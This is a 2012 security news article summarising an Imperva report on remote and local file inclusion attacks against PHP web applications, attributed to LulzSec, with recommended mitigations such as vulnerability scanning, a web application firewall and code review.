Related Links

Top 5 Stories


Imperva analyzes LulzSec’s attack tool

02 April 2012

In its latest Hacker Intelligence Initiative report, Imperva analyzes remote and local file inclusion (RFI/LFI) attacks as favored by LulzSec.

“RFI/LFI attacks enable hackers to execute malicious code and steal data through the manipulation of a company’s web server. RFI was among the four most prevalent Web application attacks used by hackers in 2011,” notes the report. “In fact,” it adds, “RFI/LFI was used most prominently by hacktivists.”

The attack takes advantage of PHP capabilities – specifically the ability to ‘include’ a separate file. “Web applications that are vulnerable to malicious file inclusion typically include accept target as a user controlled parameter and fail to sufficiently validate it. Parameters that are vulnerable to RFI enable an attacker to include code from a remotely hosted file in a script executed on the application’s server.” A successfully exploited RFI vulnerability in the PHP code will allow a hacker to take complete control of the web server – and PHP is used by more than 75% of the internet’s web applications. 

Recent hacks include the TimThumb vulnerability that led to the compromise of 1.2 million WordPress websites, and the military dating website that was breached by hacktivist group Lulzsec.

Imperva suggests a number of ways to mitigate against RFI/LFI attacks. These include finding your own vulnerabilities using the same methods as the hackers: dorking (otherwise known as ‘Google hacking’, which uses the search engines to find hints of possible vulnerabilities); and the use of both commercial and free vulnerability scanners. Also useful would be a web application firewall (WAF) and blacklisting known attacks IPs. The report also notes that the application code can be written to exclude RFI attacks, so detailed code review is advisable. 

“However, ensuring that each and every piece of database access code is immune to RFI attack in normal-size applications that also include third party components is difficult. One must therefore assume that deployed web applications probably do include RFI vulnerabilities upon deployment and complement code review with a WAF,” it concluded.

This article is featured in:
Application Security  •  Internet and Network Security  •  IT Forensics


Comment on this article

You must be registered and logged in to leave a comment about this article.

We use cookies to operate this website and to improve its usability. Full details of what cookies are, why we use them and how you can manage them can be found by reading our Privacy & Cookies page. Please note that by using this site you are consenting to the use of cookies. ×